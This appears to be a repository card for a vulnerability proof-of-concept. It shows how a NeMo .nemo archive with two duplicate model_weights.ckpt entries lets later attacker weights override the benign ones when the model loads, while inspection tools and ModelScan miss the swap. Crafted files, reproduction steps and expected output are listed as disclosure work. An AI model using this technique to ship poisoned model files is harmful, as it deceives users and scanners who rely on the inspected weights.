YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
NeMo .nemo duplicate archive member β reader differential PoC
Vulnerability class: Model File Vulnerability (MFV) β archive member last-write differential
Target: NeMo β NVIDIA
Tested format: .nemo (TAR archive)
Summary
A .nemo model file is a TAR archive containing model_config.yaml and
model_weights.ckpt. If the archive contains two entries named
model_weights.ckpt, NeMo's restore path extracts all members sequentially
(SaveRestoreConnector._safe_extract), writing each to the same output path.
The last member overwrites the first on disk. A simple archive inspection script
that selects the first matching model_weights.ckpt member observes the benign
checkpoint, while the runtime extraction path uses the later member written to
disk β the attacker-controlled weights.
ModelScan 0.8.8 does not cover the .nemo format and reports SCAN_NOT_SUPPORTED
with 0 issues for both the benign and crafted files.
Files
| File | Description |
|---|---|
benign.nemo |
Reference model: single model_weights.ckpt entry, identity weights |
dup_weights_last.nemo |
Crafted model: two model_weights.ckpt entries β first is benign (identity), second is malicious (99Γ scale + offset) |
reproduce.py |
Verifies the reader differential and output manipulation |
requirements.txt |
Python dependencies |
Reproduction
pip install -r requirements.txt
python reproduce.py
Expected output
NEMO_TAR_LAST_WRITE_WINS=True
FIRST_MATCH_SEES_BENIGN=True
EXTRACTED_FILE_IS_LAST=True
OUTPUT_FLIP_CONFIRMED=True
first_match output = [1.0, 2.0] (benign, what first-match inspector sees)
nemo_extract output = [198.0, 297.0] (malicious, what sequential extraction writes)
delta = [197.0, 295.0]
MODELSCAN_RESULT=0 issues / SCAN_NOT_SUPPORTED
=== Archive member table (dup_weights_last.nemo) ===
[0] model_config.yaml (38 bytes)
[1] model_weights.ckpt (1829 bytes)
[2] model_weights.ckpt (1829 bytes)
=== Prediction table ===
Model Output
benign.nemo [1.0, 2.0]
dup_weights_last.nemo [198.0, 297.0] <- sequential extract, last wins
[PASS] All checks passed.
Mechanism
In dup_weights_last.nemo, the TAR archive contains two members named
model_weights.ckpt:
- Member [1] (index 0 among weight entries): benign identity weights
{bias: [0, 0], scale: [1, 1]}β produces output[1.0, 2.0]for input[1, 2] - Member [2] (index 1 among weight entries): malicious 99Γ weights
{bias: [99, 99], scale: [99, 99]}β produces output[198.0, 297.0]for the same input
NeMo's SaveRestoreConnector._safe_extract iterates tar.getmembers() in archive
order and calls tar.extract(member, out_folder) for each member that passes the
path-safety check. When two members share a name, the second call overwrites the
file written by the first. The model is then loaded from os.path.join(tmpdir, 'model_weights.ckpt'), which now contains the attacker-supplied weights.
Source reference:
nemo/core/connectors/save_restore_connector.py β _safe_extract, _unpack_nemo_file, load_config_and_state_dict
Permalink: https://github.com/NVIDIA/NeMo/blob/43707ab33d0b1b621dae87454fed9122a7022d28/nemo/core/connectors/save_restore_connector.py
Reader comparison
| Reader | API | Resolution | Weights loaded |
|---|---|---|---|
| First-match archive inspection | getmembers() β first model_weights.ckpt entry |
first match | identity (benign) |
NeMo restore path (_safe_extract) |
tar.extract() for each member in order |
last write wins | 99Γ scale (malicious) |
| ModelScan 0.8.8 | .scan() |
not scanned | 0 issues (SCAN_NOT_SUPPORTED) |
- Downloads last month
- 9